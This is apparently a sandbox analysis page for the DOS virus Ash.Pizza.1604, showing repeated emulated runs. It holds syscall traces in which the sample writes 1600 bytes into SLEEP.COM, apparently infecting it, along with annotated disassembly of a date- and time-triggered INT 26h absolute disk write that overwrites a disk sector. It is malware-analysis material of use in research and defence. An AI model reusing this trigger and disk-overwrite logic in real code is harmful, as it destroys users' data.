Sample viewer

vx.netlux.org/Virus.DOS.Ash.Pizza.1604


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:12:13.814422986Z 26 PC: 12ace | Set disk transfer address
2018-12-17T22:12:13.816419168Z 78 PC: 12b27 | Find first file
2018-12-17T22:12:13.822556491Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:12:13.830150842Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:12:13.837494672Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:12:13.839160581Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:12:13.842693372Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-17T22:12:13.869827647Z 66 PC: 12b94 | Move file pointer
2018-12-17T22:12:13.871116237Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:12:13.877363177Z 62 PC: 12b1b | Close file
2018-12-17T22:12:13.885891131Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.889483848Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.892759364Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.895581694Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.898449681Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.901141466Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.903505771Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.90665596Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.908790299Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.911284085Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.922684269Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.925353972Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.927639031Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.931260255Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.933420576Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.936074404Z 59 PC: 12be9 | Change current directory
2018-12-17T22:12:13.941518385Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
; Date/time trigger check; continues after `cmp dl, 4` on the line above.
; INT 21h "Get date" returns DH = month, DL = day; "Get time" returns
; CH = hour, CL = minute, DH = second, DL = hundredths.
0x12bfb: jne 0x12c07          ; day != 4 -> go to the time check
0x12bfd: cmp dh, 7            ; month == 7?
0x12c00: jne 0x12c07          ; no -> go to the time check
0x12c02: xor ax, ax           ; day 4 of month 7: AX = 0
0x12c04: jmp 0x12c25          ; 0x12c25 (listed under the next Get time entry) moves AX into DX ahead of int 0x26
0x12c06: nop
0x12c07: mov ah, 0x2c         ; INT 21h function 2Ch: get system time
0x12c09: int 0x21
0x12c0b: or cl, cl            ; minute == 0?
0x12c0d: jne 0x12c32          ; no -> branch past 0x12c14 onward
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> branch past 0x12c14 onward
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax            ; excerpt ends here; the branch that uses these flags is not shown
2018-12-17T22:12:13.943897054Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
; Continues after `or cl, cl` on the line above (CL = minute from "Get time").
; With minute 0 and hour below 6 this path sets up INT 26h, the DOS absolute
; disk write (AL = drive, CX = sector count, DX = first sector, DS:BX = buffer).
; The path is clock-gated: a run at other clock values never reaches int 0x26.
0x12c0d: jne 0x12c32          ; minute != 0 -> bypass the write
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> bypass the write
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax               ; AX was 0 -> make it 1
0x12c25: mov dx, ax           ; DX = first sector; also reached from 0x12c04 with AX = 0
0x12c27: mov cx, 1            ; one sector
0x12c2a: xor bx, bx           ; buffer offset 0
0x12c2c: mov ah, 0x19         ; INT 21h function 19h: get default drive, returned in AL
0x12c2e: int 0x21
0x12c30: int 0x26             ; absolute disk write of one sector to the default drive
0x12c32: mov bx, 0x3df        ; target of the two bypass branches above; BX = 0x3df
2018-12-17T22:12:13.946293482Z 44 PC: 12c39 | Get time 0x12c39: inc dh
; Continues after `inc dh` on the line above (DH = seconds from "Get time").
; Reduces DH below the byte at 0x407, uses it to index a table of words,
; prints the string the entry points to, then dispatches on the byte stored
; immediately before that string.
0x12c3b: cmp dh, byte ptr [0x407]
0x12c3f: jl 0x12c47                 ; DH below the byte at 0x407 -> stop reducing
0x12c41: sub dh, byte ptr [0x407]
0x12c45: jmp 0x12c3b                ; repeat until DH is below the byte at 0x407
0x12c47: mov al, dh
0x12c49: mov cl, al
0x12c4b: cwde                       ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c4c: shl ax, 1                  ; index * 2: table entries are words
0x12c4e: add bx, ax                 ; presumably BX still holds 0x3df from 0x12c32; 0x12c35-0x12c38 are not listed - confirm
0x12c50: mov si, word ptr [bx]      ; SI = selected table entry
0x12c52: mov ch, byte ptr [si - 1]  ; CH = byte just before the address in SI
0x12c55: mov dx, si
0x12c57: mov ah, 9                  ; INT 21h function 09h: print the '$'-terminated string at DS:DX
0x12c59: int 0x21
0x12c5b: cmp ch, 0
0x12c5e: je 0x12c89                 ; CH == 0 -> 0x12c89 (outside this excerpt)
0x12c60: cmp ch, 1
0x12c63: je 0x12c63                 ; CH == 1 -> branches to itself, so execution stalls here
0x12c65: cmp ch, 2                  ; handling of further values lies past the end of this excerpt
2018-12-17T22:12:13.949722257Z 9 PC: 12c5b | Display string (String= 'eFp�pF� �Fp� n � ��p��� �pZp�5p��CON Gp��!AUX Yp���PRN kp��9CLOCK')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:00.821553274Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:00.82322091Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:00.829754084Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:00.836841493Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:00.851275727Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:00.85310117Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:00.856761424Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:00.874871178Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:00.877469947Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:00.884989391Z 62 PC: 12b1b | Close file
2018-12-25T11:46:00.894406662Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.898770845Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.901488954Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.904563571Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.907854094Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.910719693Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.913025738Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.920203907Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.922476317Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.925769754Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.928537646Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.931105717Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.933289667Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.936999527Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.944931662Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.947586222Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:00.952426108Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
; Date/time trigger check; continues after `cmp dl, 4` on the line above.
; INT 21h "Get date" returns DH = month, DL = day; "Get time" returns
; CH = hour, CL = minute, DH = second, DL = hundredths.
0x12bfb: jne 0x12c07          ; day != 4 -> go to the time check
0x12bfd: cmp dh, 7            ; month == 7?
0x12c00: jne 0x12c07          ; no -> go to the time check
0x12c02: xor ax, ax           ; day 4 of month 7: AX = 0
0x12c04: jmp 0x12c25          ; 0x12c25 (listed under the next Get time entry) moves AX into DX ahead of int 0x26
0x12c06: nop
0x12c07: mov ah, 0x2c         ; INT 21h function 2Ch: get system time
0x12c09: int 0x21
0x12c0b: or cl, cl            ; minute == 0?
0x12c0d: jne 0x12c32          ; no -> branch past 0x12c14 onward
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> branch past 0x12c14 onward
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax            ; excerpt ends here; the branch that uses these flags is not shown
2018-12-25T11:46:00.955038612Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
; Continues after `or cl, cl` on the line above (CL = minute from "Get time").
; With minute 0 and hour below 6 this path sets up INT 26h, the DOS absolute
; disk write (AL = drive, CX = sector count, DX = first sector, DS:BX = buffer).
; The path is clock-gated: a run at other clock values never reaches int 0x26.
0x12c0d: jne 0x12c32          ; minute != 0 -> bypass the write
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> bypass the write
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax               ; AX was 0 -> make it 1
0x12c25: mov dx, ax           ; DX = first sector; also reached from 0x12c04 with AX = 0
0x12c27: mov cx, 1            ; one sector
0x12c2a: xor bx, bx           ; buffer offset 0
0x12c2c: mov ah, 0x19         ; INT 21h function 19h: get default drive, returned in AL
0x12c2e: int 0x21
0x12c30: int 0x26             ; absolute disk write of one sector to the default drive
0x12c32: mov bx, 0x3df        ; target of the two bypass branches above; BX = 0x3df
2018-12-25T11:46:00.957299998Z 25 PC: 12c30 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.380545558Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:01.396171Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:01.402786088Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.409937395Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:01.417278145Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:01.41868918Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.422932507Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:01.439779381Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:01.445320867Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.45224676Z 62 PC: 12b1b | Close file
2018-12-25T11:46:01.460907271Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.463730642Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.465961559Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.468624048Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.471345616Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.473086452Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.474580223Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.477378481Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.47958457Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.482079279Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.484735963Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.487148574Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.489289398Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.493370663Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.495757606Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.498129658Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:01.503436239Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
; Date/time trigger check; continues after `cmp dl, 4` on the line above.
; INT 21h "Get date" returns DH = month, DL = day; "Get time" returns
; CH = hour, CL = minute, DH = second, DL = hundredths.
0x12bfb: jne 0x12c07          ; day != 4 -> go to the time check
0x12bfd: cmp dh, 7            ; month == 7?
0x12c00: jne 0x12c07          ; no -> go to the time check
0x12c02: xor ax, ax           ; day 4 of month 7: AX = 0
0x12c04: jmp 0x12c25          ; 0x12c25 (listed under the next Get time entry) moves AX into DX ahead of int 0x26
0x12c06: nop
0x12c07: mov ah, 0x2c         ; INT 21h function 2Ch: get system time
0x12c09: int 0x21
0x12c0b: or cl, cl            ; minute == 0?
0x12c0d: jne 0x12c32          ; no -> branch past 0x12c14 onward
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> branch past 0x12c14 onward
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax            ; excerpt ends here; the branch that uses these flags is not shown
2018-12-25T11:46:01.505918956Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
; Continues after `or cl, cl` on the line above (CL = minute from "Get time").
; With minute 0 and hour below 6 this path sets up INT 26h, the DOS absolute
; disk write (AL = drive, CX = sector count, DX = first sector, DS:BX = buffer).
; The path is clock-gated: a run at other clock values never reaches int 0x26.
0x12c0d: jne 0x12c32          ; minute != 0 -> bypass the write
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> bypass the write
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax               ; AX was 0 -> make it 1
0x12c25: mov dx, ax           ; DX = first sector; also reached from 0x12c04 with AX = 0
0x12c27: mov cx, 1            ; one sector
0x12c2a: xor bx, bx           ; buffer offset 0
0x12c2c: mov ah, 0x19         ; INT 21h function 19h: get default drive, returned in AL
0x12c2e: int 0x21
0x12c30: int 0x26             ; absolute disk write of one sector to the default drive
0x12c32: mov bx, 0x3df        ; target of the two bypass branches above; BX = 0x3df
2018-12-25T11:46:01.508188657Z 25 PC: 12c30 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.642094627Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:01.643749636Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:01.650535541Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.656757854Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:01.672967459Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:01.674293028Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.677489426Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:01.694462062Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:01.695794056Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.702060292Z 62 PC: 12b1b | Close file
2018-12-25T11:46:01.710082465Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.713663805Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.715619952Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.718525604Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.721387861Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.723822014Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.725885804Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.733569361Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.736168681Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.738550703Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.753775697Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.756530752Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.758842019Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.762052136Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.764400148Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.766819311Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:01.771706672Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
; Date/time trigger check; continues after `cmp dl, 4` on the line above.
; INT 21h "Get date" returns DH = month, DL = day; "Get time" returns
; CH = hour, CL = minute, DH = second, DL = hundredths.
0x12bfb: jne 0x12c07          ; day != 4 -> go to the time check
0x12bfd: cmp dh, 7            ; month == 7?
0x12c00: jne 0x12c07          ; no -> go to the time check
0x12c02: xor ax, ax           ; day 4 of month 7: AX = 0
0x12c04: jmp 0x12c25          ; 0x12c25 (listed under the next Get time entry) moves AX into DX ahead of int 0x26
0x12c06: nop
0x12c07: mov ah, 0x2c         ; INT 21h function 2Ch: get system time
0x12c09: int 0x21
0x12c0b: or cl, cl            ; minute == 0?
0x12c0d: jne 0x12c32          ; no -> branch past 0x12c14 onward
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> branch past 0x12c14 onward
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax            ; excerpt ends here; the branch that uses these flags is not shown
2018-12-25T11:46:01.77383406Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
; Continues after `or cl, cl` on the line above (CL = minute from "Get time").
; With minute 0 and hour below 6 this path sets up INT 26h, the DOS absolute
; disk write (AL = drive, CX = sector count, DX = first sector, DS:BX = buffer).
; The path is clock-gated: a run at other clock values never reaches int 0x26.
0x12c0d: jne 0x12c32          ; minute != 0 -> bypass the write
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> bypass the write
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax               ; AX was 0 -> make it 1
0x12c25: mov dx, ax           ; DX = first sector; also reached from 0x12c04 with AX = 0
0x12c27: mov cx, 1            ; one sector
0x12c2a: xor bx, bx           ; buffer offset 0
0x12c2c: mov ah, 0x19         ; INT 21h function 19h: get default drive, returned in AL
0x12c2e: int 0x21
0x12c30: int 0x26             ; absolute disk write of one sector to the default drive
0x12c32: mov bx, 0x3df        ; target of the two bypass branches above; BX = 0x3df
2018-12-25T11:46:01.775853299Z 44 PC: 12c39 | Get time 0x12c39: inc dh
; Continues after `inc dh` on the line above (DH = seconds from "Get time").
; Reduces DH below the byte at 0x407, uses it to index a table of words,
; prints the string the entry points to, then dispatches on the byte stored
; immediately before that string.
0x12c3b: cmp dh, byte ptr [0x407]
0x12c3f: jl 0x12c47                 ; DH below the byte at 0x407 -> stop reducing
0x12c41: sub dh, byte ptr [0x407]
0x12c45: jmp 0x12c3b                ; repeat until DH is below the byte at 0x407
0x12c47: mov al, dh
0x12c49: mov cl, al
0x12c4b: cwde                       ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c4c: shl ax, 1                  ; index * 2: table entries are words
0x12c4e: add bx, ax                 ; presumably BX still holds 0x3df from 0x12c32; 0x12c35-0x12c38 are not listed - confirm
0x12c50: mov si, word ptr [bx]      ; SI = selected table entry
0x12c52: mov ch, byte ptr [si - 1]  ; CH = byte just before the address in SI
0x12c55: mov dx, si
0x12c57: mov ah, 9                  ; INT 21h function 09h: print the '$'-terminated string at DS:DX
0x12c59: int 0x21
0x12c5b: cmp ch, 0
0x12c5e: je 0x12c89                 ; CH == 0 -> 0x12c89 (outside this excerpt)
0x12c60: cmp ch, 1
0x12c63: je 0x12c63                 ; CH == 1 -> branches to itself, so execution stalls here
0x12c65: cmp ch, 2                  ; handling of further values lies past the end of this excerpt
2018-12-25T11:46:01.778258483Z 9 PC: 12c5b | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:02.075232107Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:02.07707694Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:02.0836446Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:02.090093109Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:02.099300885Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:02.101225Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:02.105099403Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:02.12039646Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:02.122089447Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:02.128746213Z 62 PC: 12b1b | Close file
2018-12-25T11:46:02.137539456Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.140450615Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.142637385Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.144929445Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.147059942Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.149350714Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.151188198Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.155080861Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.157105822Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.15937478Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.162160777Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.164639382Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.167116647Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.170328155Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.172750722Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.175880189Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:02.181524067Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
; Date/time trigger check; continues after `cmp dl, 4` on the line above.
; INT 21h "Get date" returns DH = month, DL = day; "Get time" returns
; CH = hour, CL = minute, DH = second, DL = hundredths.
0x12bfb: jne 0x12c07          ; day != 4 -> go to the time check
0x12bfd: cmp dh, 7            ; month == 7?
0x12c00: jne 0x12c07          ; no -> go to the time check
0x12c02: xor ax, ax           ; day 4 of month 7: AX = 0
0x12c04: jmp 0x12c25          ; 0x12c25 (listed under the next Get time entry) moves AX into DX ahead of int 0x26
0x12c06: nop
0x12c07: mov ah, 0x2c         ; INT 21h function 2Ch: get system time
0x12c09: int 0x21
0x12c0b: or cl, cl            ; minute == 0?
0x12c0d: jne 0x12c32          ; no -> branch past 0x12c14 onward
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> branch past 0x12c14 onward
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax            ; excerpt ends here; the branch that uses these flags is not shown
2018-12-25T11:46:02.184747061Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
; Continues after `or cl, cl` on the line above (CL = minute from "Get time").
; With minute 0 and hour below 6 this path sets up INT 26h, the DOS absolute
; disk write (AL = drive, CX = sector count, DX = first sector, DS:BX = buffer).
; The path is clock-gated: a run at other clock values never reaches int 0x26.
0x12c0d: jne 0x12c32          ; minute != 0 -> bypass the write
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32          ; hour >= 6 (signed compare) -> bypass the write
0x12c14: add cl, ch           ; CL = minute + hour
0x12c16: mov ax, cx
0x12c18: cwde                 ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c19: add al, dh           ; add seconds
0x12c1b: adc al, dl           ; add hundredths plus carry
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax               ; AX was 0 -> make it 1
0x12c25: mov dx, ax           ; DX = first sector; also reached from 0x12c04 with AX = 0
0x12c27: mov cx, 1            ; one sector
0x12c2a: xor bx, bx           ; buffer offset 0
0x12c2c: mov ah, 0x19         ; INT 21h function 19h: get default drive, returned in AL
0x12c2e: int 0x21
0x12c30: int 0x26             ; absolute disk write of one sector to the default drive
0x12c32: mov bx, 0x3df        ; target of the two bypass branches above; BX = 0x3df
2018-12-25T11:46:02.187444965Z 44 PC: 12c39 | Get time 0x12c39: inc dh
; Continues after `inc dh` on the line above (DH = seconds from "Get time").
; Reduces DH below the byte at 0x407, uses it to index a table of words,
; prints the string the entry points to, then dispatches on the byte stored
; immediately before that string.
0x12c3b: cmp dh, byte ptr [0x407]
0x12c3f: jl 0x12c47                 ; DH below the byte at 0x407 -> stop reducing
0x12c41: sub dh, byte ptr [0x407]
0x12c45: jmp 0x12c3b                ; repeat until DH is below the byte at 0x407
0x12c47: mov al, dh
0x12c49: mov cl, al
0x12c4b: cwde                       ; NOTE(review): printed as cwde, but this one-byte opcode in 16-bit code is normally CBW (sign-extend AL into AX) - confirm against the raw bytes
0x12c4c: shl ax, 1                  ; index * 2: table entries are words
0x12c4e: add bx, ax                 ; presumably BX still holds 0x3df from 0x12c32; 0x12c35-0x12c38 are not listed - confirm
0x12c50: mov si, word ptr [bx]      ; SI = selected table entry
0x12c52: mov ch, byte ptr [si - 1]  ; CH = byte just before the address in SI
0x12c55: mov dx, si
0x12c57: mov ah, 9                  ; INT 21h function 09h: print the '$'-terminated string at DS:DX
0x12c59: int 0x21
0x12c5b: cmp ch, 0
0x12c5e: je 0x12c89                 ; CH == 0 -> 0x12c89 (outside this excerpt)
0x12c60: cmp ch, 1
0x12c63: je 0x12c63                 ; CH == 1 -> branches to itself, so execution stalls here
0x12c65: cmp ch, 2                  ; handling of further values lies past the end of this excerpt
